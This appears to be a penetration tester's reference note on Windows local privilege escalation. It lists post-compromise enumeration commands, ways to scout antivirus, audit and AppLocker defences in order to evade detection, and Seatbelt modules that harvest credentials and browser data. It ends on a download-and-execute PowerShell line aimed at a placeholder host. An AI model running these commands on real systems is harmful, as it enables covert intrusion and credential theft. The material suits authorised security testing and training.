# Local privilege escalation
The following note assumes that a low privilege shell could be obtained on the target.
To leverage a shell from a Remote Code Execution (RCE) vulnerability please refer to the `[General] Shells` note.
“The more you look, the more you see.” ― Pirsig, Robert M., Zen and the Art of Motorcycle Maintenance
### Basic enumeration
The following commands can be used to grasp a better understanding of the current system:
| | DOS | Powershell | WMI | | | |
| -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------- | ---------------------------------------------------------------------- | ----------------------- |
| **Basic info** | `net config workstation` | `Get-ComputerInfo` | | | | |
| **OS details** | `systeminfo` | `[environment]::OSVersion.Version` | | | | |
| **OS Architecture** | `echo %PROCESSOR_ARCHITECTURE%` | `[Environment]::Is64BitOperatingSystem` | `wmic os get osarchitecture` | | | |
| **Hostname** | `hostname` | `$env:ComputerName` | wmic computersystem get name
(PS) (Get-WmiObject Win32\_ComputerSystem).Name
| | | |
| **Fully qualified hostname** | `net config workstation \| findstr /C:"Full Computer name"` | `[System.Net.Dns]::GetHostByName($env:computerName)` | | | | |
| **Drives** | | \[System.IO.DriveInfo]::getdrives()
Get-PSDrive -PSProvider FileSystem
| | | | |
| **Curent Domain** | echo %userdomain%
systeminfo | findstr "Domain"
| $env:UserDomain (NetBIOS domain name)
$env:UserDomain (fully qualified domain name)
systeminfo | Select-String Domain
| (PS) `(Get-WmiObject Win32_ComputerSystem).Domain` | |
| **Curent User** | whoami /all
net user %username%
| `$env:UserName` | (PS) `(Get-WmiObject Win32_ComputerSystem).UserName` | | | |
| **Local users** | net users
net users \
| `Get-LocalUser` | wmic USERACCOUNT list full
(PS) Get-WMIObject Win32\_UserAccount -NameSpace "root\CIMV2" -Filter "LocalAccount='$True'"
| | | |
| **Local groups** | `net localgroup` | *(Win10+)* `Get-LocalGroup` | `wmic group list full` | | | |
| **Local groups' member(s)** | net localgroup Administrators
net localgroup \
| Get-LocalGroupMember -Name "\"
foreach ($group in Get-LocalGroup) { \[PSCustomObject]@{ Group = $group.Name; User = (($group | Get-LocalGroupMember).Name | Out-String) } | fl }
| |
| **Connected users** | qwinsta
query user
| | | | | |
| **Powershell version** | `Powershell $psversiontable` | `$psversiontable` | | | | |
| **Environement variables** | `set` | `Get-ChildItem Env: \| ft Key,Value` | | | | |
| **Mounted disks** | `fsutil fsinfo drives` | `Get-PSDrive \| where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}` | `wmic volume get DriveLetter,FileSystem,Capacity` | | | |
| **Writable directories** | `dir /a-rd /s /b` | | | | | |
| **Writable files** | `dir /a-r-d /s /b` | | | | | |
| **Processes** | `tasklist /v` | `Get-Process \| Ft Name,Id` | wmic process get name,processid,executablepath,commandline,parentprocessid
(PS) Get-WmiObject -Query "Select \* from Win32\_Process" | where {$\_.Name -notlike "svchost\*"} | Select Name, Handle, @{Label="Owner";Expression={$\_.GetOwner().User}} | ft -AutoSize
|
| **Processes command line** | | | wmic process get Name,ProcessID,ExecutablePath
(PS) Get-WmiObject win32\_process | Select Name,Handle,CommandLine | Format-List
| |
| **`TCP` / `UDP` network connections** | `netstat -anob` | `Get-NetTCPConnection` | | | | |
| User Account Control (UAC)
EnableLUA = 0x1 -> UAC is enabled (default since Windows Vista / Windows Server 2008).
LocalAccountTokenFilterPolicy = 0x1 -> UAC remote restrictions are disabled (non default).
FilterAdministratorToken = 0x1 -> UAC is enforced for the local built-in Administrator account RID 500 (non default).
| reg query HKEY\_LOCAL\_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA
reg query HKEY\_LOCAL\_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v LocalAccountTokenFilterPolicy
reg query HKEY\_LOCAL\_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v FilterAdministratorToken
| `Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name EnableLUA,LocalAccountTokenFilterPolicy,FilterAdministratorToken` | | | | |
**Installed .NET framework**
A number of tools may require the use of the `.NET Framework`, either for privileges escalation or post exploitation. The `.NET Framework 4.8` will be the last version released of the `.NET Framework` (only security updates and reliability hotfixes will follow).
Each version of the `.NET Framework` contains the `Common Language Runtime (CLR)`, used to execute `managed code` of `.NET` programs. A `.NET` programs should be build to target the `CLR` version associated with the `.NET Framework` installed on the (targeted) host. For instance, an utility can be build to target the `.NET Framework 4.8` even if only the `.NET Framework 4` is installed on the host the utility will be executed on.
| .NET Framework version | CLR version |
| ------------------------------------------------------------------------------------------------------------ | ----------- |
| .NET Framework 2.0
.NET Framework 3.0
.NET Framework 3.5
| 2 |
| .NET Framework 4
.NET Framework 4.5 - 4.8
| 4 |
The `.NET Framework` is installed by default on Windows, with [a version depending on the Windows version](https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/versions-and-dependencies):
| Windows version / build | .NET Framework version |
| ------------------------------------------------------------------------------------------ | ----------------------------------------------------------------------------------- |
| `Windows Server 2022` | `.NET Framework 4.8` |
| `Windows 11` | `.NET Framework 4.8` |
| `Windows 10 (build 1903+)` | .NET Framework 4.8
.NET Framework 3.5 SP1\*
|
| Windows Server 2019
Windows Server version 1803 / 1809
| `.NET Framework 4.7.2` |
| `Windows 10 (build 1803 / 1809)` | .NET Framework 4.7.2
.NET Framework 3.5 SP1\*
|
| `Windows Server version 1709` | `.NET Framework 4.7.1` |
| `Windows 10 (build 1709)` | .NET Framework 4.7.1
.NET Framework 3.5 SP1\*
|
| `Windows 10 (build 1703)` | .NET Framework 4.7
.NET Framework 3.5 SP1\*
|
| `Windows Server 2016` | `.NET Framework 4.6.2` |
| `Windows 10 (build 1607)` | .NET Framework 4.6.2
.NET Framework 3.5 SP1\*
|
| `Windows 10 (build 1511)` | .NET Framework 4.6.1
.NET Framework 3.5 SP1\*
|
| `Windows 10 (build 1507)` | .NET Framework 4.6.0
.NET Framework 3.5 SP1\*
|
| `Windows Server 2012 R2` | .NET Framework 4.5.1
.NET Framework 3.5 SP1\*
|
| `Windows Server 2012` | .NET Framework 4.5
.NET Framework 3.5 SP1\*
|
| `Windows 8.1` | .NET Framework 4.5.1
.NET Framework 3.5 SP1\*
|
| `Windows 8` | .NET Framework 4.5
.NET Framework 3.5 SP1\*
|
| `Windows 7` | `.NET Framework 3.5.1` |
| `Windows Server 2008 R2` | `.NET Framework 3.5.1` |
| `Windows Server 2008 SP2` | .NET Framework 3.0 SP2\*
.NET Framework 2.0 SP1
|
| Windows Server 2008
Windows Server 2008 SP1
| .NET Framework 3.0 SP1\*
.NET Framework 2.0 SP1
|
| `Windows Vista SP1` | .NET Framework 3.0 SP1\*
.NET Framework 2.0 SP1
|
| `Windows Vista` | .NET Framework 3.0\*
.NET Framework 2.0
|
| `Windows Server 2003 (x86)` | .NET Framework 2.0
.NET Framework 1.1
|
\**The `.NET Framework` version must be enabled (either through the `Control Panel` or, for Windows Server, through the `Server Manager`).*
The version of the `.NET Framework` framework installed can be determined through registry key entries. Additionally, before `.NET Framework 4.0`, the installed `.NET Framework` version can be determined using the names of the folder in the `\Windows\Microsoft.NET\Framework64\` directory. For later versions, the `MSBuild.exe` utility, packaged with the `.NET` framework, can be used to establish the precise version installed. If the execution of `MSBuild.exe` is blocked, the version can still be retrieved manually.
```
# .NET 4.5 and later.
# The "Release" DWORD key corresponds to the particular version of the .NET Framework installed.
# Values of the Release DWORD: https://github.com/dotnet/docs/blob/master/docs/framework/migration-guide/how-to-determine-which-versions-are-installed.md
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full"
# Alternatively the MSBuild.exe utility can be used instead of directly quering the registry.
cd \Windows\Microsoft.NET\Framework64\v4.0.30319
.\MSBuild.exe
# .NET 1.1 through 3.5.
# List all install versions (subkeys under NDP).
reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\
# Retrieve the "Version" key of the specified .NET installation
reg query HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\
# Alternative for .NET all versions.
# The "FileVersion" property of the .NET installation dlls can be used to determine, through a Google search query, the precise installed version
cd \Windows\Microsoft.NET\Framework64\
Get-Item "Accessibility.dll" | fl
# Or
$file = Get-Item "Accessibility.dll"
[System.Diagnostics.FileVersionInfo]::GetVersionInfo($file).FileVersion
```
### Defense and supervision scouting
Before attempting a local privilege escalation, notably in a covert scenario, establishing a precise vision on the system security defense and supervision mechanisms may help evade detection.
**Antivirus product**
The `Windows Security Center` is a Windows component which, among other features, keep track of the antivirus products installed on the system and their status (monitoring mode and antivirus signatures update status). The `Security Center` consolidates the `Windows Defender` status as well as third party antivirus solutions by:
* searching for registry keys and files provided to Microsoft by the antivirus software manufacturers
* exposing a WMI provider on which antivirus software manufacturers can report their product status
Note that some `Endpoint Detection and Response (EDR)` solutions may not be registered in the `SecurityCenter` and can only be detected by listing the running processes or configured services.
```bash
# SecurityCenter: Windows 2000, Windows Server 2003, Windows XP, and older
# SecurityCenter2: Windows Vista, Windows Server 2008, or newer
Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct | Ft displayName,productState,timestamp
WMIC /Node:localhost /Namespace:\rootSecurityCenter2 Path AntiVirusProduct Get displayName,productState,timestamp /Format:List
```
The `productState` property can be parsed and converted to a human readable format using the following PowerShell code snippet:
```bash
$productState = ""
$hex = [Convert]::ToString($productState, 16).PadLeft(6,'0')
$WSC_SECURITY_PRODUCT_STATE = $hex.Substring(2,2)
$WSC_SECURITY_SIGNATURE_STATUS = $hex.Substring(4,2)
$RealTimeProtectionStatus = switch ($WSC_SECURITY_PRODUCT_STATE) {
"00" {"OFF"}
"01" {"EXPIRED"}
"10" {"ON"}
"11" {"SNOOZED"}
default {"UNKNOWN"}
}
$DefinitionStatus = switch ($WSC_SECURITY_SIGNATURE_STATUS) {
"00" {"UP_TO_DATE"}
"10" {"OUT_OF_DATE"}
default {"UNKNOWN"}
}
Write-Host "Real time protection status:" $RealTimeProtectionStatus
Write-Host "Signature update status:" $DefinitionStatus
```
**Audit policies**
The configured audit policies can be retrieved within the registry.
In particular, whether or not the command line is logged in process creation events (`Security` hive, `4688: A new process has been created`) is of importance, as a process command line arguments may yield information about a tool function, compromised accounts or C2 servers, and be very able for the blue team.
```bash
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit"
# "ProcessCreationIncludeCmdLine_Enabled: 0x1" = the command line is logged in process creation
events
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit" /v ProcessCreationIncludeCmdLine_Enabled
```
**Windows Event Forwarding**
`Windows Event Forwarding (WEF)` is a Microsoft Windows component that forwards the chosen event logs to a `Windows Event Collector (WEC)` server, for back up or security monitoring.
The following registry key can be queried to retrieve information about a possible `WEF` subscription:
```bash
reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager
```
**AppLocker**
`AppLocker` is a Windows native feature, added in Windows 7 Enterprise, that allows, through the definition of rules, for the restriction and control of the files users can execute.
The configured `AppLocker` rules are stored in multiple locations within the registry and can also be retrieved using the `Get-AppLockerPolicy` PowerShell cmdlet.
Note that the `appidsvc` service must be running for `AppLocker` to be functional.
```bash
Get-AppLockerPolicy -Effective | Select-Object -ExpandProperty RuleCollections
# Configured AppLocker rules, stored in XML format
# The "EnforcementMode" subkey of each category (exe, scripts, MSI, Appx, DLL) corresponds to the enforcement status of the AppLocker rules of the category
# "EnforcementMode: 0x0" = Audit only
# "EnforcementMode: 0x1" = Enforce rules
reg query HKLM\Software\Policies\Microsoft\Windows\SrpV2 /s
# Mirror key
reg query HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\SrpV2 /s
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\
# AppLocker pushed down from a Group Policy Object (GPO), stored in XML format
reg query HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\Machine\Software\Policies\Microsoft\Windows\SrpV2
sc.exe query appidsvc
```
Additionally, the presence and size of the event logs hive `Microsoft-Windows-AppLocker/EXE and DLL` can also be a good indicator of whether or not `AppLocker` is enabled. If the log file is not present or is empty (the evtx file has a size of 68 Ko / 69 632 bytes) then `AppLocker` may not have been enabled and configured on the system.
```
dir C:\Windows\System32\winevt\Logs | findstr /i AppLocker
```
For more information about `AppLocker`, refer to the `Windows - Bypass AppLocker` note.
**Seatbelt**
`Seatbelt` is a C# tool that can be used to enumerate a number of security mechanisms of the target such as the PowerShell restrictions, audit and Windows Event Forwarding settings, registered antivirus, firewall rules, installed patches and last reboot events, etc.
`Seatbelt` can also be used to gather interesting user data such as saved RDP connections files and putty SSH host keys, AWS/Google/Azure cloud credential files, browsers bookmarks and histories, etc.
```
# Currently available (last update 20210511) SeatBelt commands (+ means remote usage is supported):
+ AMSIProviders - Providers registered for AMSI
+ AntiVirus - Registered antivirus (via WMI)
+ AppLocker - AppLocker settings, if installed
ARPTable - Lists the current ARP table and adapter information (equivalent to arp -a)
AuditPolicies - Enumerates classic and advanced audit policy settings
+ AuditPolicyRegistry - Audit settings via the registry
+ AutoRuns - Auto run executables/scripts/programs
+ ChromiumBookmarks - Parses any found Chrome/Edge/Brave/Opera bookmark files
+ ChromiumHistory - Parses any found Chrome/Edge/Brave/Opera history files
+ ChromiumPresence - Checks if interesting Chrome/Edge/Brave/Opera files exist
+ CloudCredentials - AWS/Google/Azure/Bluemix cloud credential files
+ CloudSyncProviders - All configured Office 365 endpoints (tenants and teamsites) which are synchronised by OneDrive.
CredEnum - Enumerates the current user's saved credentials using CredEnumerate()
+ CredGuard - CredentialGuard configuration
dir - Lists files/folders. By default, lists users' downloads, documents, and desktop folders (arguments == [directory] [depth] [regex] [boolIgnoreErrors]
+ DNSCache - DNS cache entries (via WMI)
+ DotNet - DotNet versions
+ DpapiMasterKeys - List DPAPI master keys
EnvironmentPath - Current environment %PATH$ folders and SDDL information
+ EnvironmentVariables - Current environment variables
+ ExplicitLogonEvents - Explicit Logon events (Event ID 4648) from the security event log. Default of 7 days, argument == last X days.
ExplorerMRUs - Explorer most recently used files (last 7 days, argument == last X days)
+ ExplorerRunCommands - Recent Explorer "run" commands
FileInfo - Information about a file (version information, timestamps, basic PE info, etc. argument(s) == file path(s)
+ FileZilla - FileZilla configuration files
+ FirefoxHistory - Parses any found FireFox history files
+ FirefoxPresence - Checks if interesting Firefox files exist
+ Hotfixes - Installed hotfixes (via WMI)
IdleTime - Returns the number of seconds since the current user's last input.
+ IEFavorites - Internet Explorer favorites
IETabs - Open Internet Explorer tabs
+ IEUrls - Internet Explorer typed URLs (last 7 days, argument == last X days)
+ InstalledProducts - Installed products via the registry
InterestingFiles - "Interesting" files matching various patterns in the user's folder. Note: takes non-trivial time.
+ InterestingProcesses - "Interesting" processes - defensive products and admin tools
InternetSettings - Internet settings including proxy configs and zones configuration
KeePass - Finds KeePass configuration files
+ LAPS - LAPS settings, if installed
+ LastShutdown - Returns the DateTime of the last system shutdown (via the registry).
LocalGPOs - Local Group Policy settings applied to the machine/local users
+ LocalGroups - Non-empty local groups, "-full" displays all groups (argument == computername to enumerate)
+ LocalUsers - Local users, whether they're active/disabled, and pwd last set (argument == computername to enumerate)
+ LogonEvents - Logon events (Event ID 4624) from the security event log. Default of 10 days, argument == last X days.
+ LogonSessions - Windows logon sessions
LOLBAS - Locates Living Off The Land Binaries and Scripts (LOLBAS) on the system. Note: takes non-trivial time.
+ LSASettings - LSA settings (including auth packages)
+ MappedDrives - Users' mapped drives (via WMI)
McAfeeConfigs - Finds McAfee configuration files
McAfeeSiteList - Decrypt any found McAfee SiteList.xml configuration files.
MicrosoftUpdates - All Microsoft updates (via COM)
NamedPipes - Named pipe names and any readable ACL information.
+ NetworkProfiles - Windows network profiles
+ NetworkShares - Network shares exposed by the machine (via WMI)
+ NTLMSettings - NTLM authentication settings
OfficeMRUs - Office most recently used file list (last 7 days)
OracleSQLDeveloper - Finds Oracle SQLDeveloper connections.xml files
+ OSInfo - Basic OS info (i.e. architecture, OS version, etc.)
+ OutlookDownloads - List files downloaded by Outlook
+ PoweredOnEvents - Reboot and sleep schedule based on the System event log EIDs 1, 12, 13, 42, and 6008. Default of 7 days, argument == last X days.
+ PowerShell - PowerShell versions and security settings
+ PowerShellEvents - PowerShell script block logs (4104) with sensitive data.
+ PowerShellHistory - Searches PowerShell console history files for sensitive regex matches.
Printers - Installed Printers (via WMI)
+ ProcessCreationEvents - Process creation logs (4688) with sensitive data.
Processes - Running processes with file info company names that don't contain 'Microsoft', "-full" enumerates all processes
+ ProcessOwners - Running non-session 0 process list with owners. For remote use.
+ PSSessionSettings - Enumerates PS Session Settings from the registry
+ PuttyHostKeys - Saved Putty SSH host keys
+ PuttySessions - Saved Putty configuration (interesting fields) and SSH host keys
RDCManFiles - Windows Remote Desktop Connection Manager settings files
+ RDPSavedConnections - Saved RDP connections stored in the registry
+ RDPSessions - Current incoming RDP sessions (argument == computername to enumerate)
+ RDPsettings - Remote Desktop Server/Client Settings
RecycleBin - Items in the Recycle Bin deleted in the last 30 days - only works from a user context!
reg - Registry key values (HKLM\Software by default) argument == [Path] [intDepth] [Regex] [boolIgnoreErrors]
RPCMappedEndpoints - Current RPC endpoints mapped
+ SCCM - System Center Configuration Manager (SCCM) settings, if applicable
+ ScheduledTasks - Scheduled tasks (via WMI) that aren't authored by 'Microsoft', "-full" dumps all Scheduled tasks
SearchIndex - Query results from the Windows Search Index, default term of 'passsword'. (argument(s) ==
SecPackageCreds - Obtains credentials from security packages
SecurityPackages - Enumerates the security packages currently available using EnumerateSecurityPackagesA()
Services - Services with file info company names that don't contain 'Microsoft', "-full" dumps all processes
+ SlackDownloads - Parses any found 'slack-downloads' files
+ SlackPresence - Checks if interesting Slack files exist
+ SlackWorkspaces - Parses any found 'slack-workspaces' files
+ SuperPutty - SuperPutty configuration files
+ Sysmon - Sysmon configuration from the registry
+ SysmonEvents - Sysmon process creation logs (1) with sensitive data.
TcpConnections - Current TCP connections and their associated processes and services
TokenGroups - The current token's local and domain groups
TokenPrivileges - Currently enabled token privileges (e.g. SeDebugPrivilege/etc.)
+ UAC - UAC system policies via the registry
UdpConnections - Current UDP connections and associated processes and services
UserRightAssignments - Configured User Right Assignments (e.g. SeDenyNetworkLogonRight, SeShutdownPrivilege, etc.) argument == computername to enumerate
+ WindowsAutoLogon - Registry autologon information
WindowsCredentialFiles - Windows credential DPAPI blobs
+ WindowsDefender - Windows Defender settings (including exclusion locations)
+ WindowsEventForwarding - Windows Event Forwarding (WEF) settings via the registry
+ WindowsFirewall - Non-standard firewall rules, "-full" dumps all (arguments == allow/deny/tcp/udp/in/out/domain/private/public)
WindowsVault - Credentials saved in the Windows Vault (i.e. logins from Internet Explorer and Edge).
WMIEventConsumer - Lists WMI Event Consumers
WMIEventFilter - Lists WMI Event Filters
WMIFilterBinding - Lists WMI Filter to Consumer Bindings
+ WSUS - Windows Server Update Services (WSUS) settings, if applicable
# Executes the specified module(s).
SeatBelt.exe [Command2] [-full]
# Conducts "user" checks, executing the following modules:
# Certificates, ChromiumPresence, CloudCredentials, CloudSyncProviders, CredEnum,
# dir, DpapiMasterKeys, Dsregcmd,
# ExplorerMRUs, ExplorerRunCommands,
# FileZilla, FirefoxPresence,
# IdleTime, IEFavorites, IETabs, IEUrls
# KeePass,
# MappedDrives
# OfficeMRUs, OracleSQLDeveloper,
# PowerShellHistory, PuttyHostKeys, PuttySessions,
# RDCManFiles, RDPSavedConnections,
# SecPackageCreds, SlackDownloads, SlackPresence, SlackWorkspaces, SuperPutty,
# TokenGroups,
# WindowsCredentialFiles, WindowsVault
SeatBelt.exe -group=user [-full]
# Conducts "system" checks, executing the following modules:
# AMSIProviders, AntiVirus, AppLocker, ARPTable, AuditPolicies, AuditPolicyRegistry, AutoRuns,
# Certificates, CredGuard,
# DNSCache, DotNet,
# EnvironmentPath, EnvironmentVariables,
# Hotfixes,
# InterestingProcesses, InternetSettings,
# LAPS, LastShutdown, LocalGPOs, LocalGroups, LocalUsers, LogonSessions, LSASettings,
# McAfeeConfigs,
# NamedPipes, NetworkProfiles, NetworkShares, NTLMSettings,
# OSInfo,
# PoweredOnEvents, PowerShell, Processes, PSSessionSettings,
# RDPSessions, RDPsettings,
# SCCM, Services, Sysmon,
# TcpConnections, TokenPrivileges,
# UAC, UdpConnections, UserRightAssignments,
# WindowsAutoLogon, WindowsDefender, WindowsEventForwarding, WindowsFirewall, WMIEventConsumer, WMIEventFilter, WMIFilterBinding, WSUS
Seatbelt.exe -group=system
# Executes all checks, with fully detailed results.
SeatBelt.exe -group=all [-full]
# Executes SeatBelt from memory (as a gzip-compressed and base64-encoded .Net assembly loaded in PowerShell).
# From PowerSharpBinaries https://github.com/S3cur3Th1sSh1t/PowerSharpPack/
IEX(New-Object Net.WebClient).DownloadString("http://[:]/